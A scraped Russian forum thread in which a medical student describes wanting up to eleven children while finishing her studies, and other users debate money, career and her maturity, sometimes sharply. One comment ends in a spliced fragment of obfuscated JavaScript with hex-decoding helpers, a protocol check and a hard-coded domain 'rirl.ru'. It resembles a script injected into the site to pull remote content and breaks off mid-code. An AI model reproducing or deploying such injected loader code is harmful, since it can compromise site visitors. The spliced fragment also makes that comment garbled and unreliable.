Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-03 13:29:26 от Гость
Здравствуйте мы смужем вместе 12 лет. есть двое детей. было всякое но последнее время стала очень мучить проблема отсутствия работы у мужа я работаю. в начале отношений училась потом была в декрете но потом постоянно работала чтобы ни случилось и как ... Подробнее
Последний комментарий
История : История из жизни
час назад2016-12-03 18:03:25 от саша кот
7974Арийка*** , спасибо) Все комментарии67542
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Беременность и роды
На работу к папе
три часа назад2016-12-03 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Лев
23 ноября в 17:13:44
Беременность и роды - Учеба или детишки?
Беременность и роды : Учеба или детишки?     

Всем привет! Я по профессии будущий врач. И чем больше я узнаю какой-либо информации, тем страшнее в будущем заводить детей. Вы знали, что к родам нужно готовиться 21 год? Конечно, это звучит глупо, но медицина есть медицина и с ней не поспоришь. 

Я очень хочу деток. В свои 20 лет, я мечтаю о большой семье. Хочу 4-11 детей. 11 так как можно собрать свою футбольную команду, но честно, это плохо влияет на организм женщины. Влияет на все функции организма и расшатывает нервную систему. Если я бы не училась на врача, то не знала об этом и мне жилось легче. Но к счастью или к сожалению это не так. 

Я готовлюсь к родам, прохожу полное обследование, привожу здоровье в порядок. Мой парень только рад этому. У нас последний секс был без предохранения и я не смогла забеременеть, а знаете почему?! Потому что это не было периодом овуляции. Если я не была бы врачом, то этого тоже не знала бы. 

И мне нравится моя будущая профессия, но учится нужно 7 лет, а я учусь только 2 года. И уже собираюсь замуж, но бросать учебу не хочу и детишек хочу. А плодотворный возраст не так уж и долог, тем более я хочу много детишек, много ангелочков в моей жизни. 

Тяжелая ситация, над которй я думаю постоянно. 

61885
Другие Беременность и роды
(54)
Гость
Гость

12 ноября 2015 18:33:40
2015-11-12 18:33:40
4 хорошо, но вот 11 детей?Автор дай Бог что бы у вас все было хорошо. Но если вы родите 11 детей то в моих глазах вы будете ГЕРОИНЕЙ!Это точно. Ведь это огромный труд. Но вот насчет учебы я не знаю. Вы сами должны решать. Но знаете как говорят ведь никакая работа, никакие деньги не заменять семью. Главное в жизни - это семья? Карьера - не ждет тебя дома, деньги - не вытрут слезы, а слава - не обнимут ночью!Вот это правда. Но чтобы в жизни была главной семья надо для начала найти порядочного и любимого человека, и ещё надо чтобы он тебя тоже любил и уважал. Если этого в комплекте не будет, то и не обнимет никто , и слез будет ещё больше автор.
Ответить
Поддерживаю Да1 / Нет0
Лисий Хвостик
18460 Лисий Хвостик
Лисий Хвостик offline
Репутация : 162746
Комментариев 1393 19
12 ноября 2015 18:38:36
2015-11-12 18:38:36

А вы уверены, что способны не только материально обеспечить 4х (ваш минимум) детей, но и правильно воспитать их? Вы хотя бы одного для начала вырастите. У меня сестра на 14 лет меня младше, так вот в 14 я поняла, что не буду готова к детям ещё лет 10. Тут с одним не успеваешь, а вы про 11.

Потому что это не было периодом овуляции. Если я не была бы врачом, то этого тоже не знала бы. - это знает любая девушка, которая хочет забеременеть или наоборот, использует календарный цикл для предохранения.

А что думает ваш парень? Мужчины бегут и от меньшего количества детей с оправданием, что "не были готовы к этому". Не боитесь остаться матерью одиночкой? А если у ребёнка будет ДЦП, справитесь? Или другие хронические заболевания, требующие постоянной госпитализации?

Попр обуйте сначала поработать в садике нянечкой, а то наивное у вас видение семьи.

Ответить
Поддерживаю Да5 / Нет0
The darkness around me - shores of a Solar sea.
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 18:48:48
2015-11-12 18:48:48

Bleeding soul, Спасибо за комментарий! Такой человек у меня имеется, в отношениях уже 3 года. Дай Бог, летом будет свадьба!

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

12 ноября 2015 18:51:18
2015-11-12 18:51:18
A. A. A., Ну тогда удачи вам. Всех благ!!
Ответить
Поддерживаю Да0 / Нет0
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 19:00:01
2015-11-12 19:00:01

Лисий Хвостик Да, я уверена, что смогу материально обеспечить детей. Так как я и мой парень из обеспеченных семей. Я будущий врач, а значит у меня будет стабильный заработок. Мой молодой человек работает по специальности в хорошем месте и учится очно на второе высшее, он образованный, самодостаточный человек. Он умеет зарабатывать и распоряжаться деньгами.

У меня тоже есть сестренки и их 2. Одной 13, второй 5. И я учавствовала в воспитании каждой. Так же нянчилась с двоюродными братишками и сестренками. И дети меня любят, так же как и я люблю их. Если Вы в 14 лет решили, что не хотите иметь детей еще лет 10. ТО это лично ваше сугубо личное мнение, но я решила в СВОИ 20, что хочу детей и чем больше, тем лучше. Потому что дети- это цветы жизни!

Не каждая девушка пользуется календарным циклом для предохранения! Поверьте это я говорю по личному опыту. Были случае на практике, когда девушки молодые приходят к геникологу и не знают того, что беремены и срок составляет ни много, ни мало 4-6 денель.

Мой парень тоже любит детей. Знаете есть такое, одна мечта на двох? Например, иметь большую и дружную семью. Не все парни попадают под стереотипы, есть те, кто не такие.

Можно на раннем сроке беременности выявить болезни ребенка и решать вам уже рожать его или предотвратить роды. Не дай Бог сталкнуться с этим! И вам и нам!

Нянечкой я работать не могу, потому что учеба забирает много времени! Но каждые выходные я хожу в детский дом и играю с детьми, устраиваю сценки и различные конкурсы.

Надеюсь я ответила на все вами вопросы.

Ответить
Поддерживаю Да2 / Нет0
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 19:00:43
2015-11-12 19:00:43

Bleeding soul, Спасибо большое и Вам всего самого хорошего!

Ответить
Поддерживаю Да1 / Нет0
Туманная Андромеда
19430 Туманная Андромеда
Туманная Андромеда offline
Репутация : 4571
Комментариев 38 0
12 ноября 2015 19:09:30
2015-11-12 19:09:30

Все ваши медицинские знания, которыми вы блеснули в данной истории, известны каждому, кто изучал школьный курс биологии. А насчет 11-ти детей.. Вы сначала хотябы одного родите, потом может больше и не захочется

Ответить
Поддерживаю Да4 / Нет0
Кем бы ты ни был,будь им до конца
Лисий Хвостик
18460 Лисий Хвостик
Лисий Хвостик offline
Репутация : 162746
Комментариев 1393 19
12 ноября 2015 19:14:03
2015-11-12 19:14:03

A. A. A., ну, вы говорите, что будете врачом со стабильным заработком, но если планируете столько детей, то будете полжизни сидеть в декрете, а без опыта работы не будет и хорошей зарплаты..

Про календарный срок индивидуально, кто как. Я про овуляцию - это каждый знает, кто элементарно интересуется своим здоровьем. Я к тому, что у врачей должны быть знания глубже, а не "я знаю, что такое овуляция, я же врач"))

Всё же, лично моё мнение, окончите сначала учёбу. Жизнь непредсказуема, а учитывать нужно всё, а не только хорошее.

Мамина коллега по работе жила душа в душу с мужем, 5 детей. Вдруг у мужа остановилось сердце. Теперь она одна поднимает дочек. Тоже самое было с другой женщиной - муж попал в аварию..

Надеюсь, что у вас получится, как вы хотите, но подумайте хорошенько обо всём, даже 4 детей - это уже большая ответственность и есть куча обстоятельств нам неподвластных.

Ответить
Поддерживаю Да1 / Нет0
The darkness around me - shores of a Solar sea.
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 19:16:46
2015-11-12 19:16:46

Туманная Андромеда, Если вы знаете эти факты, то не значит, что каждый знает. Если вы не знали, то в освном население медицински не образовано. И кстатти, Вам по биологии 5! Видно хорошо учились.

Захочется.

Ответить
Поддерживаю Да0 / Нет0
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 19:30:50
2015-11-12 19:30:50

Лисий Хвостик, Спасибо за беспокойство! Да, я знаю, что нужен опыт работы и повышение квалификации. С этим как-нибудь со временем разберемся. Знания, я считаю, что глубоки. Но написала достаточно понятным языком для всех, могла бы и конечно по другому. Например, в то время я не понимала, что уровень эстрогена в моем организме не растет и не задумывалась, что он не приведет к резкому повышению уровня лютеинизирующего гармона. У меня не было всплеска ЛГ, который приводит к разрыву доминантного фолликула и выходу из него созревшей яйцеклеки. Затем яйцеклетка должна попасть в фаллопиеву трубу. Но этого не произошло и я не смогла зачать ребенка. Потому что сперматозоид не соединился с яецеклеткой и не прикрепился к стенке матки. Надеюсь такой ответ Вас устроил)

Я сочувствую этим женщинам, но у каждого своя судьба. Не дай Бог, чтобы это испытать!

Спасибо большое, за вашу надежду. И Вам всего наилучшего!

Ответить
Поддерживаю Да1 / Нет0
Еваника
18243 Еваника
Еваника offline
Репутация : 168914
Комментариев 1685 4
12 ноября 2015 19:53:44
2015-11-12 19:53:44

Лично мое мнение, что образование надо получить обязательно. Жизнь ведь совершенно непредсказуема, и надеяться в ней можно только на себя.

Ну а Вы видите жизнь и свою судьбу по-своему. Имеете полное право. :)

Только все-таки к ребенку нужно готовить не только свое тело, но и материальную базу...

Ответить
Поддерживаю Да4 / Нет0
А в голове: "на лабутенах я..."
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 20:33:47
2015-11-12 20:33:47

Еваника, Еваника, Спасибо, за совет! Конечно, не спорю, без образования в наше время никуда. Согласна с вами и про здоровье, и про материальную базу, но с этим нет никаких проблем. Спасибо за понимание.

Ответить
Поддерживаю Да0 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1662407
Комментариев 6907 36
12 ноября 2015 21:17:26
2015-11-12 21:17:26

Веселая история.

О яйцеклетке и овуляции я узнала в 11 лет, когда мне подарили книгу "Энциклопедя для маленьких принцесс". В 10 классе школы разобралась с этим вопросом окончательно.

Честно говоря, очень сложно представить себе современную девушку, которая живет половой жизнью и не знает, что такое овуляция и зачем она нужна.

Ну это ладно, фиг с ним.

Автор, очень милая у вас мечта. 11 делей - отлично. Да, как врач вы только что разгромно доказали свою компетентность: вы знаете ч, что такое фаллопиева труба и названия важных женских гормонов. Это круто, бесспорно. Возможно вы даже знаете, что такое базальная температура и ановуляторный цикл. Как врач вы компетентны. А как математик?

Допустим, родите в 22 и бедете пусть даже раз в полтора года повышать демографические показатели планеты на одного человека. Это 17 лет, плюс 3 года декрета за самым младшим. Итого, на работу вы выйдете в 42 года. При отсутвии стажа (если вообще успеете доучиться), ваши курсы повышения квалификации будут очень кстати.

А воспитывать кто будет вашу футбольную команду, когда вы на работу выйдете? Убирать за ними, на кружки возить, с уроками помогать? 11 нянь наймете и 3 домработницы? Не ну, в принуипе, почему бы и нет, вы же из обеспеченной семьи.

Так прикольно. Но вы так еще отвечаете при этом... назидательно. Прямо вот серьезно, сразу видно, какая вы птица важная.

Очень весело, правда.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да8 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 21:48:34
2015-11-12 21:48:34

Сиреневая Кошка, Нет, я не важная) Я очень общительный и доброжелательный человек, поверьте на слово) Очень рассмешили Ваши слова про важную птицу, это не так.

Просто я не виновата, что воспринимают всерьез про 11 детей. Да, честно, я бы хотела. Очень-очень, но это ведь мечты. И я не знаю получится ли осуществить ее или нет, но мечта есть мечта. возможно и такое случится. У меня могут быть двойняшки, так же можно искусственно родить сразу 3 или 4 детишек. Вы 100% об этом знаете, но дело далеко не в этом. Я просто об этом мечтаю, мечтать ведь ник то не запрещал. Возможно это будет под категорией "Несбывшиеся мечты", не отрицаю этого, но я действительно этого хочу.

С математикой у меня тоже все в порядке) и я понимаю все то, что вы только что расписали, я тоже думала об этом, но опять же это всего лишь мечта и не известно сбудится она или нет.

Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

12 ноября 2015 22:17:36
2015-11-12 22:17:36

A. A. A., Автор, 11 детей? Вы нас тут не провоцируете случайно?))) Вы еще очень молоды, учитесь, любите) И предохраняйтесь!

Ответить
Поддерживаю Да1 / Нет1
Нежная роза
8829 Нежная роза
Нежная роза offline
Репутация : 154526
Комментариев 2288 27
12 ноября 2015 22:38:54
2015-11-12 22:38:54
Во всем надо знать меру. И в детях тоже. Вы так богаты? Можете позволить себе дом из десятка комнат? Или штабелями их складывать? Вам хватит денег, чтобы всем покупать новую одежду, или, как многие стараются, будете экономить, и младшие будут донашивать за старшими? Сможете купить всем не самые дешевые телефоны? Дети - большие расходы. Даже если вы из обеспеченных семей, это какое богатство надо иметь, чтобы хватило. Ведь бывают непредвиденные обстоятельства - болезни, смерти, кризисы... Поэтому, я бы выучилась сначала. Работу нашла. А потом рожала бы. Три-четыре ребенка родить после этого можно успеть. А больше ни к чему.
Ответить
Поддерживаю Да2 / Нет1
Оптимист видит наполовину полный стакан, а пессимист - наполовину пустой.
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
12 ноября 2015 22:50:05
2015-11-12 22:50:05

Уж простите, автор, я не медик, но описанное выше знала и без 2 лет обучения в медицинском.

Меня вот что интересует.... Вы так хотите быть врачом, но:

1. у нас врачи так много получают, что можно завести 11 детей? Все, срочно пора идти во врачи!

Какая бы обеспеченная семья не была, вы сами должны обеспечивать своих детей! Или вы решили на шею родителей их скинуть? Так дети вам нужны в таком количестве, а не вашим родственникам! По-моему, вы пока недооцениваете то количество финансов, которое нужно на ребенка, вот и мечтаете о футбольной команде.

2. когда вы собрались работать врачом, если вы только и будете, что рожать?

3. а если вы не из породы тех, кто беременеет при каждом чихе, то тогда как вы вообще планируете успеть 11 детей?

Или вы уже прям сейчас начали стараться над тем, чтоб забеременеть? А как же тогда желание стать врачом? Как же учеба? Академ будете брать? И сколько раз вы так будете в академе, ведь вы хотите же 11 детей?

Что-то как-то вы не продумали все тут...

Ответить
Поддерживаю Да4 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Гость
Гость

12 ноября 2015 22:54:56
2015-11-12 22:54:56
A. A. A., Хорошие у вас мечты автор. Но что бы мечты воплотились в действительность надо приложить не мало усилий для этого. А так это похвально что вы такая молоденькая, и уже хотите иметь столько детей. Вы молодец. Но я думаю 11 детей это Очень много. Да и правильно вам тут пишут девочки, что бы обеспечить ребенку достойное будущее нужно хорошо стоять на ногах и быть уверенным в завтрашнем дне. Быть уверенным в том что у ваших детишек будет все не обходимое для того что бы они жили в нормальных условиях.
Ответить
Поддерживаю Да0 / Нет0
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 23:07:45
2015-11-12 23:07:45

Ольга С, Нет, что Вы, конечно, не провоцирую) Спасибо за совет!

Ответить
Поддерживаю Да0 / Нет0
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 23:11:30
2015-11-12 23:11:30

Нежная роза, Чужие деньги не считают. Да, можем себе этого позволить. И я сказала, что это мечта. Поэтому сколько Бог детей даст, столько и будет! Лишь бы здоровыми были! А я хочу 11 детей, поэтому буду об этом мечтать!

Ответить
Поддерживаю Да0 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
12 ноября 2015 23:16:04
2015-11-12 23:16:04

A. A. A., да вы сами с ними не управитесь! Вот будет у вас хотя бы 4-5 детей, вы одна с ними пробудете несколько дней и по другому заговорите! А 11 вас тем более умотают! Я раньше передачу смотрела, так вот там показывали семьи, где много детей... Бедные мамочки, им воды выпить было некогда!

Если вы нас не троллите и серьезно это про 11 детей, то вы странная, ей Богу! Нет, ладно, еще 3 детей, хотя и то не каждый отважится по нашей жизни, но 11... Может вам к врачу стоит сходить? Простите, но это ужас!

Ответить
Поддерживаю Да2 / Нет1
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Лисий Хвостик
18460 Лисий Хвостик
Лисий Хвостик offline
Репутация : 162746
Комментариев 1393 19
12 ноября 2015 23:20:29
2015-11-12 23:20:29

Читательница , согласна. Дети ведь не игрушки, чтобы наиграться и бросить их. Это на всю жизнь. Тут от одного с ума сойти можно, если болезненный, да кричит постоянно, а про 11 вообще.. Да, думаю, после первых родов уже мнение изменится, а после первого месяца - тем более.

Ответить
Поддерживаю Да2 / Нет0
The darkness around me - shores of a Solar sea.
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 23:26:01
2015-11-12 23:26:01

Читательница , Дорогая, Читательница. Прежде, чем писать и высказывать тут свое мнение, нужно было внимательно прочитать все, включая вышенаписанные комментарии. Там есть ответы на все ваши вопросы. Честно, вы просто их перефразировали. Нужно лишь быть немного внимательнее и получите на все ответы.

1. Я не говорила, что собираюсь вешать своих дтей на шею своих родителей. У моего молодого человека стабильный и очень хороший доход. И знаете родители всегда будут помогать своим детям, это так называется "смейные отношения", если вы не знали, а если и знали, то просто напоминаю. И любящие родители никогда не откажут детят и не кинут их на произвол судьбы.

2. Мечтать не запрещали. Я не сказала, что все точно у меня будет 11 детей, я лишь сказала, что хочу иметь такое количество детишек. А это 2 разные вещи. Еще раз повторяю нужно быть внимательнее.

3. А это лишнее. Это грубые слова для любой девшки, которая планирует завести в скором будущем детей. Не Вам это решать как мне беременеть и при каких обстоятельствах. И поэтому прошу Вас помолчать немного в данной ситуации и ришить для себя правильно ли Вы высказали свои мысли. Но это мое личное мнение, конечно, от Вашего оно может отличаться.

Опять же нужно быть внимательнее. Выше в комментариях я написала, что у меня могут быть двойняшки и можно родить 3-4 детей сразу, то есть оплодотворить яйцеклетку искусственно. Я конечно не совсем за такое, но это тоже вариант.

И желание стать врачом всегда присутствует. Думаю, каждый человек должен найти себе дело по душе и тогда в его жизни не будет рабочих дней. Это сказал Конфуций. Мудрые слова над которыми стоит задуматься. И еще знаете есть такое, что нужно совмещать приятное с полезным. Мама- самая тяжелая работа в мире, но мам-врач еще тяжелее. У кого какая планка, тот к тому и стремится. Если кто-то знает, что не осилит, то даже и не рыпается.

P. S. удачи и внимательности!

Ответить
Поддерживаю Да0 / Нет2
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 23:27:50
2015-11-12 23:27:50

Bleeding soul, Спасибо, приятно слышать такие добрые слова. Надеюсь трудностей не возникнет.

Ответить
Поддерживаю Да0 / Нет0
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 23:30:08
2015-11-12 23:30:08

Читательница , хахах, вы меня рассмешили. И что сказать, что мечтать уже запрещают и накручивают свое мнение по данному поводу?! Нет, это глупо. Если у вас другая мечта, то Боже мой, мечтайте на здоровье, а мне не мешайте. И человек счстлив тогда, когда есть о чем мечтать.

Ответить
Поддерживаю Да0 / Нет1
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
12 ноября 2015 23:33:03
2015-11-12 23:33:03

Лисий Хвостик, А никто и не говорит, что дети-игрушки. Чтобы заводить детей нужно крепко стоять на ногах и еще много много причин. Но есть семьянины и есть карьеристы. У каждого свое. А есть люди исключения, которые и то и это. Я отношусь к таким. И опять же повторюсь это МОЯ МЕЧТА! Поэтому оставайтесь при своем мнении, а я останусь при своем!

Ответить
Поддерживаю Да0 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
12 ноября 2015 23:42:19
2015-11-12 23:42:19

A. A. A., не указывайте мне, как мне читать и что писать! Чем дальше, тем больше убеждаюсь, что вы тролль неугомонный!

1. Сегодня парень ваш есть, а завтра вы одна с 11 детьми на руках! Никогда не зарекайтесь, что будете с человеком всегда, любовь у вас вечна и ничто этого не изменит. Так вы можете думать только в свои 20, а с годами по другому посмотрите на жизнь. Любовь трансформируется, проходит, а семьи разваливаются, да мало ли что может случиться, не дай Бог, конечно. А даже если с семьей будет все в порядке, то сегодня у него хороший доход, а завтра 3 рубля нужно растягивать до след. зарплаты! Рассчитывать нужно прежде всего на себя, а не на парня, рожаете вы для себя, а не для парня или родственников! Вы САМА лично сможете обеспечить 11 детей?

Родители не обязаны содержать ВАШИХ детей! Не обязаны! И ни у каждых родителей есть такая возможность! Они сами станут пенсионерами, куда им вот ваши дети, да еще и 11 человек? Вы хотите столько детей, вот сами их и содержите, а то вы уже даже комментарии на помощь родителей начали рассчитывать, как я погляжу! Вы думаете только о себе!

Перестаньте уже мне тыкать в мою внимательность, а то я вам сейчас начну тыкать в отсутствие ума и логики в ваши то 20 лет! Рассуждения у вас как у 14-летней! Что? Каникулы уже начались и тролли посыпались?

3. Вы мне еще рот будете затыкать? Я буду говорить то, что я считаю нужным! Сайт - это общественное место! Тут может высказываться любой по вашей истории и писать будут все то, что считают нужным! Если вас что-то не устраивает, то нечего вообще тут размещать истории! А раз уж разместили, то я пишу то, что хочу, тем более я старше вас и думаю еще о чем-то кроме какой - то розовой мечты, я не летаю облаках, а трезво оцениваю ситуацию и жизнь!

3-4 детей рождаются ну очень редко. Что вы вообще несете? Господи, какие вам дети, вы сама ребенок и в голове у вас розовые бантики!

P. S. Идите уроки учить и перестаньте тут рассказывать про обеспеченных парней и 11 детей! Не тратьте время пользователей на ерунду!

Ответить
Поддерживаю Да2 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Dевушк@
3954 Dевушк@
Dевушк@ offline
Репутация : 235647
Комментариев 1762 1
12 ноября 2015 23:52:43
2015-11-12 23:52:43

Смешно было читать вашу историю {#}

Вам 20 лет, а рассуждайте как 15-тилетняя) 4-11 детей) прям как моя подруга говорит: "Мне хоть 4 сразу, главное побыстрей бы" Так и вы) Сначала одного родите, потом посмотрим как вы второго захотите и через какой промежуток времени! Я тоже в ваши годы думала хочу двойню, потом еще одного через пару лет... А щас думаю хорошо, что у меня не двойня родилась, я б тогда наверное вообще про сон забыла.
Еще рассмешила фраза: "У нас последний секс был без предохранения и я не смогла забеременеть, а знаете почему?! Потому что это не было периодом овуляции. " Так и хочется сказать "Да ты что!!! что правда?!" {#} Вы прям Америку открыли)

Я советую вам отучиться в вузе, а потом заводить детей. Или хотябы лет в 25-26. Судя по истории вы в душе еще совсем ребенок.

Ответить
Поддерживаю Да3 / Нет0
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
13 ноября 2015 00:04:21
2015-11-13 00:04:21

Читательница , Полегче, полегче! Нечего злиться и держите себя в руках! И если Вы не заметили, то я Вам не тыкала! Невнемательно прочитали наверное мой комментарий в Вашу сторону. Если я Вас чем-то обидела или задела, конечно, извиняюсь, я не нарочно! Но и Вы слидите за тем, что печатаете. В социальной сети, конечно, все смелые и уверенные в себе, у каждого свое мнение и так далее, но меня это никак не касается. Я разместила это, чтобы посмотреть, что подумают люди, а не для того, чтобы закатывали истерики. И если кто-то воспринимает всерьез слова про 11 детей и так еще не понял, что это мечта, это уже их проблемы. Меня они не касаются. Я не говорю, что я повешаю на шею родителей или на шею парня своих детей. Вы не знаете мое положение в обществе, поэтому так высказываетесь. И что если родители выйдут на пенсию, поверьте в материальном плане хватит и на родителей, и на детей, и на внуков. Это уже то, что имеется.

И не нужно говорить о том, что начнете мне тыкать в отсутствие ума и логики, как раз и то, и это у меня пресутствует. ПРОСТО НУЖНО ВНИМАТЕЛЬНО ЧИТАТЬ ПРО МЕЧТУ! У Вас ведь тоже скорее всего есть мечта, поэтому мечтайте на здоровье и я буду мечтать, а то, что вы так грубы и пытаетесь как-то меня задеть, это тоже ваши проблемы. Нужно быть немного толерантнее.

И нет, к сожалению у нас в меде каникулы еще не скоро, только в конце января-начале февраля. Поэтому пока учеба.

P. S. если Вы не встречались с обеспеченными порнями, поверьте они есть. если Вы не видели женщин, родивших больше 3-4 детей, поверьте они есть. И у них хорошо и с карьерой и с детьми. Если Вы пользователь потратили время на ерунду, тогда и вовсе не стоило писать комментарий. Извиняюсь заранее, если снова как-то задела Вас.

Удачи!

Ответить
Поддерживаю Да0 / Нет2
Люда
Люда

13 ноября 2015 00:10:02
2015-11-13 00:10:02
Мечтать не вредно, вы посмотрите на работников церкви они бывает много рожают и ничего нормально им. Пусть автор мечтает это её дело. Родит, одного второго а дальше будет смотреть по обстоятельствам если она умная девушка, а не так не пойми что без ответственная.
Ответить
Поддерживаю Да0 / Нет0
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
13 ноября 2015 00:14:56
2015-11-13 00:14:56

Dевушк@, Рада, что подняли Вам настроение! Честно, устала отвечать на одни и те же вопросы. Я ведь написала, что это написано достаточно примитивным языком, чтобы каждый понял в чем суть. Отучиться, отучусь. Но когда рожать детей, это уже решать мне. Судя по истории я ребенок по вашим словам, но опять же это все настолько простым языком написано... я конечно могла поумничать, но зачем. если и так можно выразить свои мысли. Почитайте пожалуйста комментарии сверху, если я не удовлетворила вас ответом. Заранее извиняюсь, просто уже поздно, а завтра на учебу. Доброй ночи! Спасибо за понимание.

Ответить
Поддерживаю Да0 / Нет0
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
13 ноября 2015 00:17:51
2015-11-13 00:17:51

Люда, Спасибо, Госпади! Нашелся человек здравомыслящий! Спасибо, что поняли, что это моя мечта и что я хочу мечтать о большое семье! И что если в будущем будет что-то не так, то есть пойдет не по плану, то это останется в сердце, как мечта моей молодости! ЕЩЕ РАЗ СПАСИБО ВАМ! ДАЙ БОГ ЗДОРОВЬЯ!

Ответить
Поддерживаю Да0 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
13 ноября 2015 00:25:03
2015-11-13 00:25:03

A. A. A., Я везде смелая и уверенная в себе, в реальности особенно, если что, ттт, чтоб не сглазить, так что давайте не будем про смелость только в соц. сетях - это не тот случай, это не по адресу!

Какая вам разница, а что подумают люди? Вы так зависимы от общественного мнения? О, тогда вам нельзя 11 детей заводить!

Положение в обществе? И какое же у вас положение в обществе? Второй курс вуза, общага и степуха? Отличное положение в обществе!

Я все нормально прочитала про мечту! И задеть я вас не пыталась, я лишь высказала свое мнение. Мне заняться что ли нечем, как тратить время на то, чтоб вас задевать специально?

Я не говорила, что нет обеспеченных парней! Читать научитесь! Сегодня он обеспечен, а завтра нет! И мне искренне жаль паренька, которого вы выбрали по принципу его финансов!

И про женщин, которые рожают 3-4 я тоже не говорила, что их нет! Я сказала, что это редкость! А вам похоже нужны очки, чтоб читать то, что пишут комментаторы!

Прочит ала историю, потратила время, значит имею право отписать комментарий в ней, и писать я его буду таким, каким считаю нужным!

Ответить
Поддерживаю Да2 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
A.A.A.
20400 A.A.A.
A.A.A. offline
Репутация : 501
Комментариев 17 2
13 ноября 2015 00:40:11
2015-11-13 00:40:11

Читательница , Ну вы молодец, что смелая везде! Этим мы с Вами похоже.

Если что я написала что просто интересно, что подумают люди, а не то, что мне важно что именноподумают люди. И я ного раз писала, что мне без разницы, это так для уточнения.

Ну как Вас знает, от людей в наше время можно всякое ожидать.

Нет, Вы ошибаетесь, это не по принципу финансов, встречаемся мы давно, 3 года, не знаю может для Вас и мало и Вы что-то снова выскажите, но для меня это приличный срок.

Я поняла, что редко по Вашему мнению рождаются в семье 3-4 ребенка, но это не такая и редкость, нельзя судить по тому, сколько детей в вашей семье или у ваших родственников, соседий и т. д.

Да, второй курс вуза. Да, степуха. Но нет, не общага, а свой коттедж в элитном районе. И машина своя на которй я передвигаюсь. И стипуха лишь знак того, что я хорошо учусь. А так в финансовом плане я не страдаю. И да, коттедж свой, личный, подаренный на мое день рождения и для уточнения оформленный на меня! Вы ведь не знате ничего про мою семью и так громко судите! Не заете лично, не судите публично! Вы, конечно можете мне не поверить, и начнете снова к чему-то там придираться, но что имею, тому и рада.

Поздравляю, пишите на здоровье!

Доброй ночи, Читательница!

Ответить
Поддерживаю Да0 / Нет1
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
Репутация : 1662407
Комментариев 6907 36
13 ноября 2015 01:13:51
2015-11-13 01:13:51

A. A. A., Если серьезно, я считаю, что мечта у вас действительно хорошая. Лучше многих. Просто отношение к этому у вас пока недостаточно сформированное.

Я бы тоже хотела, если будут позволять финансы, иметь 3-4 детей. Вы хотите 11. Это ваша мечта и она имеет право быть.

Но вы должны понимать, даже в теории рассуждая о таких вопросах, что 11 детей и карьера (наверное, любая, даже не такая серьезная, как карьера врача), так вот эти 2 мечты: 11 детей и успешная карьера несовместимы. Они взаимоисключающие.

Я не считаю, что вы не сможете быть хорошей мамой 11 детям. Я не могу этого знать. Вы можете стать лучшей в мире мамой для своей футбольной команды, но при этом вы не сможете быть хоть сколько-нибудь хорошим врачом. Поэтому здесь придется выбирать: или все-таки ограничиться 3-4 детишками, или посвятить свою жизнь карьере матери большого семейства. Это тоже не самый худший вариант. Такие женщины есть, я ними восхищаюсь.

